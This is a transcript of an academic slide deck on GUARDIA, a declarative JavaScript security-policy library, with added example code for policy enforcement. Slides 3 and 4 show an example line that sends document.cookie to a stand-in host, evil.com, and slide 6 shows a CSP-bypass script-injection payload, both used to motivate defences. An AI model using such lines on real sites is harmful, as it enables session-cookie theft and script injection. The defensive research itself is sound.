
Declaratively Specifying Security Policies For Web Applications, Angel Luis Scull Pupo

Meta Workshop
October 30, 2016


Transcript

  1. Declaratively Specifying Security Policies For Web Applications
     Angel Luis Scull Pupo, Jens Nicolay, Elisa Gonzalez Boix {ascullpu, jens.nicolay, egonzale}@vub.ac.be
  2. Motivation
     Browser mockup of a composed web page: search box, stock services, weather information, advertisement, …
  3. Motivation
     Browser mockup showing the Window, Document, Location and History objects and a page that loads scripts from several origins:
     <html> <head> <script src="http://evil.com"></script> <script src="http://good.com"></script> … </head> <body> … </body> </html>
     One of the loaded scripts sends document.cookie to evil.com:
     let evilImage = document.createElement('img');
     evilImage.src = 'http://evil.com?user=' + document.cookie;
  4. Security policy
     let evilImage = document.createElement('img');
     evilImage.src = 'http://evil.com/takeThis?user=' + document.cookie;
     A policy that restricts which URLs are allowed in the src of images.
     A security policy restricts application behavior to prevent vulnerabilities/attacks.
  5. Security policies at browser level: Content Security Policy
     default-src 'self' good.com; script-src 'self';
     On my.cite.com, <img src="//good.com/image.jpg"> (good.com) and <script src="/code.js"> (my.cite.com) are allowed, while <script src="//attacker.com/code.js"> (attacker.com) is blocked.
  6. Security policies at browser level: CSP bypass
     script-src 'self' https://whitelisted.com; object-src none;
     Bypass through a JSONP-like endpoint on a whitelisted origin: ">'><script src="https://whitelisted.com/jsonp?callback=alert"
     Weissbacher, Michael, Tobias Lauinger, and William Robertson. "Why is CSP failing? Trends and challenges in CSP adoption." International Workshop on Recent Advances in Intrusion Detection. Springer International Publishing, 2014.
  7. Related work: Safe Wrappers and Sane Policies for Self Protecting JavaScript
     enforcePolicy({target: document, method: 'createElement'}, function(invocation){
       var str = stringOf(invocation, 0);
       if (str.indexOf('iframe') >= 0) { return; } else invocation.proceed();
     });
     • Flexible.
     • Programmers have to write code to enforce the policy.
     • Programmers have no control over the execution order of the policies.
     J. Magazinius, P. H. Phung, and D. Sands. Safe Wrappers and Sane Policies for Self Protecting JavaScript. In Informatics, pages 239–255. Berlin, Heidelberg, 2012.
  8. Related work: ConScript: Specifying and Enforcing Fine-Grained Security Policies for JavaScript in the Browser
     around(document.createElement, function (c : K, tag : U) {
       let elt : U = uCall(document, c, tag);
       if (elt.nodeName == "IFRAME") throw 'err'; else return elt;
     });
     • Flexible.
     • Capable of expressing a wide range of policies.
     • Programmers have to write code to enforce the policy.
     • Limited portability.
     L. A. Meyerovich and B. Livshits. ConScript: Specifying and Enforcing Fine-Grained Security Policies for JavaScript in the Browser. pages 481–496. IEEE, 2010.
  9. GUARDIA: our approach
     • Policies should be composable.
     • Policies should be easy to develop.
     • Programmers should not have to concern themselves with the enforcement mechanism.
  10. API of GUARDIA concepts (Construct: Description)
      Allow(arr : Array<String>) => TBase: limit the execution to the supplied properties
      Deny(arr : Array<String>) => TBase: deny the execution of the supplied properties
      Not(p : TBase) => TBase: negates the result of the policy given as parameter
      And(pArr : Array<TBase>) => TBase: perform logical and using the policies given as parameters
      Or(pArr : Array<TBase>) => TBase: perform logical or using the policies given as parameters
      ParamAt((...ps) => Boolean, pIdx : Number, arr : Array<Any>) => TBase: apply a function to one parameter of the actual execution
      StateFnParam((...ps) => Boolean, s : String, arr : Array<Any>) => TBase: apply a function to one state during an execution step
  11. Security policy specification with GUARDIA
      A policy that restricts which URLs are allowed in the src of images:
      let whiteListedSrc = ac.Or(ac.And(ac.Allow(['src']), ac.ParamInList(0, whiteURLs)), ac.Not(ac.Allow(['src'])));
  12. Can JavaScript's reflective capabilities be employed to enforce security policies without compromising transparency and tamper-proofness?
  13. Enforcement mechanism
      • The enforcement mechanism should be portable across different platforms.
      • The enforcement mechanism should be tamper-proof.
      • The enforcement mechanism should be transparent.
  14. Attacker model and enforcement mechanism
      Diagram: the attacker reaches the Document only through a Proxy, which monitors the execution to uphold security policies.
      All loaded code sources are potentially malicious!
  15. Problems with the browser's built-in objects
      Built-in objects: window, document, location, history, …
      window = makeSecureProxy(window);
      Unable to override built-in objects.
  16. GUARDIA's enforcement approach
      Built-in objects: function proxies wrap every method of the target.
      Regular objects: an object proxy wraps the entire target.
  17. Deployment of security policies
      Policy configuration object:
      { whenRead : [], readListeners : [], whenWrite : [], writeListeners: [] }
      Object proxy handler:
      { get: function(tar, prop, rec) { //security policy enforcement
          return Reflect.get(tar, prop, rec); },
        set: function(tar, prop, val, rec) { //security policy enforcement
          return Reflect.set(tar, prop, val, rec); } }
      Function proxy handler:
      { apply: function (targetFn, thisArg, arglist) { //security enforcement
          return targetFn.apply(thisArg, arglist); } }
  18. Enforcing policies in GUARDIA
      Policy configuration object:
      ac.installPolicy({ whenRead: [ac.Not(ac.And(ac.Allow(['createElement']), ac.ParamAt(equals, 0, 'iframe')))] }).on(document)
  19. toString and valueOf redefinition
      Example of toString redefinition:
      var liarObj = { value: 'div', toString: function(){ var t = this.value; this.value = 'iframe'; return t; } };
      console.log(liarObj.toString()); //div
      console.log(liarObj.toString()); //iframe
      Policy as written, which may stringify the argument more than once:
      Not(And(Allow(['createElement']), ParamAt(equals, 0, 'iframe')))
      Policy with stringOf(0), which gets the string value once!
      Not(And(Allow(['createElement']), ParamAt(equals, stringOf(0), 'iframe')))
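The combinators of slide 10, the src policy of slide 11, the Proxy traps of slides 17 and 18 and the stringify-once fix of slide 19 fit together as below; this is an added example, not GUARDIA's own code. It assumes the array form of And/Or from the API table, a constructed fakeDocument in place of the DOM, and a stringOf that coerces the inspected argument once and forwards that same string to the target.

```javascript
// Added example, not GUARDIA's own code: a minimal re-creation of the policy
// combinators of slide 10 and the Proxy-based enforcement of slides 17 to 19.
// A policy is a predicate over an access {prop, args}; true means allowed.
const Allow = (props) => (acc) => props.includes(acc.prop);
const Deny = (props) => (acc) => !props.includes(acc.prop);
const Not = (p) => (acc) => !p(acc);
const And = (ps) => (acc) => ps.every((p) => p(acc));
const Or = (ps) => (acc) => ps.some((p) => p(acc));
// stringOf coerces the argument at pIdx exactly once and writes the string back
// into acc.args, so a lying toString() is consulted once and the target later
// receives the very value the policy inspected (the fix of slide 19).
const stringOf = (acc, pIdx) => (acc.args[pIdx] = String(acc.args[pIdx]));
const ParamAt = (fn, pIdx, extra) => (acc) => fn(stringOf(acc, pIdx), extra);
const ParamInList = (pIdx, list) => ParamAt((s, l) => l.includes(s), pIdx, list);
const equals = (a, b) => a === b;
// Every policy in the list must hold; a violation aborts the access.
function check(policies, acc) {
  if (!(policies || []).every((p) => p(acc))) throw new Error('denied: ' + String(acc.prop));
  return acc;
}
// installPolicy(cfg).on(target) wraps target in a Proxy. Reading a method
// returns a function Proxy whose apply trap checks the call with its real
// arguments; plain property reads and writes are checked in get and set.
function installPolicy(cfg) {
  return { on: (target) => new Proxy(target, {
    get(tar, prop, rec) {
      const val = Reflect.get(tar, prop, rec);
      if (typeof val !== 'function') { check(cfg.whenRead, { prop, args: [] }); return val; }
      return new Proxy(val, { apply(fn, _thisArg, args) {
        const acc = check(cfg.whenRead, { prop, args: args.slice() });
        return Reflect.apply(fn, tar, acc.args); // forwards the once-coerced arguments
      } });
    },
    set(tar, prop, val, rec) {
      const acc = check(cfg.whenWrite, { prop, args: [val] });
      return Reflect.set(tar, prop, acc.args[0], rec);
    },
  }) };
}
// Constructed stand-in for the DOM so the example runs outside a browser.
const fakeDocument = { createElement: (tag) => ({ nodeName: String(tag).toUpperCase() }) };
const noIframe = Not(And([Allow(['createElement']), ParamAt(equals, 0, 'iframe')]));
const doc = installPolicy({ whenRead: [noIframe] }).on(fakeDocument);
const whiteURLs = ['http://good.com/image.jpg'];
const whiteListedSrc = Or([And([Allow(['src']), ParamInList(0, whiteURLs)]), Not(Allow(['src']))]);
const img = installPolicy({ whenWrite: [whiteListedSrc] }).on({ src: '', alt: '' });
// Helpers returning the outcome of an access, or 'denied' when a policy blocked it.
const tryCreate = (tag) => { try { return doc.createElement(tag).nodeName; } catch (e) { return 'denied'; } };
const trySetSrc = (url) => { try { img.src = url; return img.src; } catch (e) { return 'denied'; } };
```

Passing the liar object from slide 19 to tryCreate yields 'DIV': the policy sees 'div' once and the target receives that same string, so the second, lying answer is never consulted.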
  20. Function aliasing
      Attacker's code, run before the policy is installed:
      var openCopy = window.open
      …
      Code for security:
      installPolicy({ whenRead: [Deny(['open'])] }).on(window)
      …
      Security bypassed:
      openCopy.call(window, 'bad.com')
      Hence guardia.js must be the first executed script:
      <html> <header> <script src="path/to/guardia.js"></script> … </header> <body> … </html>
  21. Prototype poisoning
      var allowedUrls = { 'valid.com' : true }
      function isAllowed(url){ return allowedUrls[url] === true; }
      isAllowed('invalid.com'); //false
      Object.prototype['invalid.com'] = true;
      isAllowed('invalid.com'); //true
      Object.seal(Object.prototype);
      ECMAScript 5 features that allow preventing unintended changes in objects.
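The bypass on slide 21 next to its mitigations, as an added example that is not part of the slides: the slide's vulnerable lookup, a prototype-free allow-list with an own-property check (an assumed hardening, not from the deck), and the Object.seal(Object.prototype) call the slide names.

```javascript
// Added example, not from the slides: the prototype-poisoning bypass of slide 21
// next to two mitigations, a prototype-free allow-list and Object.seal.
// Vulnerable: a plain object literal inherits from Object.prototype, so a key
// planted there is found by the lookup as if it were in the allow-list.
const allowedUrls = { 'valid.com': true };
function isAllowed(url) { return allowedUrls[url] === true; }

// Hardened: Object.create(null) has no prototype chain to poison, and the
// hasOwnProperty check only consults the object's own keys.
const allowedUrlsSafe = Object.assign(Object.create(null), { 'valid.com': true });
function isAllowedSafe(url) {
  return Object.prototype.hasOwnProperty.call(allowedUrlsSafe, url) && allowedUrlsSafe[url] === true;
}

// Replays the slide's poisoning write (a constructed attacker step) and records
// what each lookup answers for 'invalid.com' before and after it.
function poisonAndCheck() {
  const before = [isAllowed('invalid.com'), isAllowedSafe('invalid.com')];
  Object.prototype['invalid.com'] = true;
  const after = [isAllowed('invalid.com'), isAllowedSafe('invalid.com')];
  delete Object.prototype['invalid.com']; // undo so the rest of the program is unaffected
  return { before, after };
}

// Object.seal(Object.prototype) (ES5) stops any later key from being added:
// sloppy mode ignores the write, strict mode throws a TypeError. Either way the
// vulnerable lookup now answers false for a key an attacker tries to plant.
function sealAndRetry() {
  Object.seal(Object.prototype);
  try { Object.prototype['another.com'] = true; } catch (e) { /* strict mode: TypeError */ }
  return isAllowed('another.com');
}
```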
  22. OWASP Top ten vulnerabilities (https://www.owasp.org)
      1 Injection
      2 Broken Authentication and Session Management
      3 Cross Site Scripting
      4 Insecure Direct Object Reference
      5 Security Misconfiguration
      6 Sensitive Data Exposure
      7 Missing Function Level Access Control
      8 Cross Site Request Forgery
      9 Using Components with Known Vulnerabilities
      10 Unvalidated Redirects and Forwards
  23. Results
      Table 1. Comparison of approaches in security policies. Policy numbers P1 to P8 refer to the policies discussed in section 4.
      Approaches compared: HV [6], Yu et al. [28], Phung et al. [20], ML [15], GUARDIA (one ✓ per approach that supports the policy).
      Attack type | Security policy | Supported by
      Forgery | Limited number of popup windows opened (P1) | ✓ ✓ ✓ ✓ ✓
      Forgery | No popup windows without location and status bar | ✓ ✓
      Resource abuse | Prevent abuse of resources like modal dialogues (P2) | ✓ ✓ ✓ ✓
      Restoring built-ins from frames | Disallow dynamic iframe creation (P3) | ✓ ✓ ✓
      Information leakage | Disabling page redirects after document.cookie read (P4) | ✓ ✓ ✓ ✓ ✓
      Information leakage | Allowing redirections for a whitelist of URLs (P5) | ✓ ✓ ✓
      Information leakage | Restrict XMLHttpRequest to secure connections and whitelist URLs (P6) | ✓ ✓
      Information leakage | Disallow setting of src property | ✓ ✓
      Information leakage | Disallow setting of location property | ✓ ✓ ✓
      Impersonation | XMLHttpRequest is restricted to HTTPS connections (P6) | ✓ ✓
      Impersonation / Information leakage | Disallow open and send methods of XHR object | ✓ ✓ ✓
      Man in the middle | postMessage can only send to the origins in a whitelist (P7) | ✓ ✓
      Run arbitrary code* (fix) | Disallow string arguments to setInterval & setTimeout (P8) | ✓ ✓
  24. Applying GUARDIA to an existing application: OWASP Juice Shop
      https://juice-shop.herokuapp.com/
      Vulnerabilities and challenges: https://juice-shop.herokuapp.com/#/score-board
  25. Applying GUARDIA to Juice Shop
      <html> <header> <script src="path/to/guardia.js"></script> <script src="path/to/implemented_policies.js"></script> … </header> <body> … </html>
      …
      let noAlert = Deny(['alert', 'prompt', 'confirm']);
      …
      installPolicy({ whenRead: [noAlert], … }).on(window);
      …
  26. Conclusion
      We presented GUARDIA, an internal DSL for securing JavaScript applications.
      GUARDIA is agnostic of the underlying enforcement mechanism.
      GUARDIA is able to express a wide range of security policies from the related literature.
  27. Declaratively Specifying Security Policies For Web Applications
      Angel Luis Scull Pupo, Jens Nicolay, Elisa Gonzalez Boix {ascullpu, jens.nicolay, egonzale}@vub.ac.be